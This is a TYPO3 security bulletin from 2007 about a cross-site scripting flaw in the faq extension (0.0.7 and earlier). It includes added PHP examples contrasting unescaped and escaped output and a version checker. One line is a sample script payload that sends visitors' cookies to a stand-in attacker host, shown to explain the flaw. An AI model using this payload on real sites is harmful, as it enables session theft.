[TYPO3-announce] TYPO3 Security Bulletin 20070716-1: Cross Site Scripting vulnerability in faq

Lars Houmark lars at typo3.org
Mon Jul 16 13:32:22 CEST 2007


Dear users of TYPO3,

It has been discovered that the extension faq is susceptible to cross-site scripting (XSS) attacks, making it possible to execute arbitrary JavaScript.

==== Component Type ====
Third party extension. This extension is not part of the TYPO3 default installation.

==== Affected Versions ====
Version 0.0.7 and all earlier versions

==== Vulnerability Type ====
Cross Site Scripting

==== Severity ====
medium

==== Problem Description ====
The extension outputs user-supplied input without filtering or escaping it. An attacker can therefore inject HTML and arbitrary JavaScript that executes in the browser of anyone who views the affected page.
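The following is an added illustration of the pattern described above, not code from the faq extension or from its author: a value taken from the request is concatenated straight into the plugin's HTML output, beside the escaped version. The parameter name "sword" and the markup are hypothetical; in a TYPO3 4.x tslib_pibase plugin such a value would typically arrive through $this->piVars. The block runs stand-alone on PHP 7 or later.

```php
<?php
// Added example, not code from the faq extension. The parameter name
// "sword" and the surrounding markup are hypothetical; in a TYPO3 4.x
// plugin the value would come from $this->piVars['sword'].

// Vulnerable pattern: the user-controlled value is concatenated directly
// into the HTML that the plugin returns to the page.
function renderSearchHeadingVulnerable(string $term): string
{
    return '<p class="faq-search">Results for: ' . $term . '</p>';
}

// Hardened pattern: escape for the HTML text context at the point of output.
// ENT_QUOTES also escapes single quotes, which matters if the same value is
// ever placed inside a single-quoted attribute.
function renderSearchHeadingFixed(string $term): string
{
    return '<p class="faq-search">Results for: '
        . htmlspecialchars($term, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Constructed attacker input, as it would arrive in the request.
$payload = '<script>document.location="http://attacker.invalid/?c="'
    . '+document.cookie</script>';

// The script element is emitted verbatim and runs in the visitor's browser.
echo renderSearchHeadingVulnerable($payload), "\n";

// The same input is emitted as &lt;script&gt;... and rendered as plain text.
echo renderSearchHeadingFixed($payload), "\n";
```

Escaping at output, as in renderSearchHeadingFixed, is preferable to stripping "dangerous" substrings from the input: it makes no assumptions about which characters an attacker can use and preserves the user's text unchanged.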

==== Solution ====
An updated version is available from the TYPO3 extension manager and at
http://typo3.org/extensions/repository/view/faq/0.0.8/
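As an added check that is not part of this bulletin, the script below reads the version entry from the extension's ext_emconf.php and reports whether the installed faq is older than the fixed release 0.0.8. The install path typo3conf/ext/faq/ext_emconf.php is the usual location of a TYPO3 4.x extension manifest; the sample file contents embedded in the block are constructed for the demonstration and are used when no path is given on the command line.

```php
<?php
// Added check, not from the bulletin: is the installed faq extension at or
// below 0.0.7? The sample ext_emconf.php contents below are constructed.

const FAQ_FIXED_VERSION = '0.0.8';

// Pull the 'version' entry out of the $EM_CONF array with a regex rather
// than including the file, so the check never executes the manifest.
function extractExtensionVersion(string $emconfSource): ?string
{
    if (preg_match("/'version'\s*=>\s*'([0-9.]+)'/", $emconfSource, $m)) {
        return $m[1];
    }
    return null;
}

// Affected: 0.0.7 and all earlier versions, i.e. anything below the fix.
function isVulnerableFaqVersion(string $version): bool
{
    return version_compare($version, FAQ_FIXED_VERSION, '<');
}

// Constructed sample of typo3conf/ext/faq/ext_emconf.php from an old install.
$sampleEmconf = <<<'PHP'
<?php
$EM_CONF[$_EXTKEY] = array(
    'title' => 'FAQ',
    'version' => '0.0.7',
    'state' => 'beta',
);
PHP;

// Optional argument: path to a real typo3conf/ext/faq/ext_emconf.php.
$path = $argv[1] ?? null;
$source = ($path !== null && is_readable($path))
    ? file_get_contents($path)
    : $sampleEmconf;

$version = extractExtensionVersion($source);
if ($version === null) {
    fwrite(STDERR, "Could not find a version entry in ext_emconf.php\n");
    exit(2);
}

$vulnerable = isVulnerableFaqVersion($version);
printf("faq %s: %s\n", $version,
    $vulnerable ? 'VULNERABLE, update to ' . FAQ_FIXED_VERSION : 'ok');
exit($vulnerable ? 1 : 0);
```

Run it as `php check_faq.php /path/to/typo3conf/ext/faq/ext_emconf.php`; the exit status (1 for vulnerable, 0 for ok, 2 if no version was found) makes it usable from a cron job or a fleet-wide audit script.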

==== General advice ====
Follow the recommendations given in the TYPO3 Security Cookbook [1] and keep an eye on the TYPO3 security bulletin page [2].

==== Credits ====
Credits go to security team member Ekkehard Gümbel, who discovered the issue, and to the author Markus Lange, who made a fixed version available.

[1] http://typo3.org/fileadmin/security-team/typo3_security_cookbook_v-0.5.pdf
[2] http://typo3.org/teams/security/security-bulletins/

Regards,

Lars Houmark
lars at typo3.org
